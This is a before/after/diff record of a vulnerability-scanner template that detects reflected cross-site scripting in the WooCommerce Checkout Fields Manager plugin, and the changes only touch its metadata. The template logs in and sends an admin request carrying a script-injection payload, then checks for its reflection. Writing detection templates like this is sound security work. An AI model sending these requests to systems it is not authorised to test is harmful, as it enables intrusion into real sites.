vulnerabilities/wordpress/checkout-fields-manager-xss.yaml (before)
id: checkout-fields-manager-xss

info:
  name: Checkout Fields Manager for WooCommerce < 5.5.7 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
    - https://wordpress.org/plugins/woocommerce-checkout-manager
  metadata:
    verified: true
  tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=wc-settings&tab=wooccm&section=advanced&">--><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '>--><script>alert(1)</script>&action=wooccm_nuke_options&'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/checkout-fields-manager-xss.yaml (after)
id: checkout-fields-manager-xss

info:
  name: WordPress Checkout Fields Manager for WooCommerce <5.5.7 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Checkout Fields Manager for WooCommerce 5.5.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
    - https://wordpress.org/plugins/woocommerce-checkout-manager
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=wc-settings&tab=wooccm&section=advanced&">--><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '>--><script>alert(1)</script>&action=wooccm_nuke_options&'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/checkout-fields-manager-xss.yaml (diff)
@@ -1,15 +1,19 @@
 id: checkout-fields-manager-xss
 
 info:
-  name: Checkout Fields Manager for WooCommerce < 5.5.7 - Reflected Cross-Site Scripting
+  name: WordPress Checkout Fields Manager for WooCommerce <5.5.7 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Checkout Fields Manager for WooCommerce 5.5.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577
     - https://wordpress.org/plugins/woocommerce-checkout-manager
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
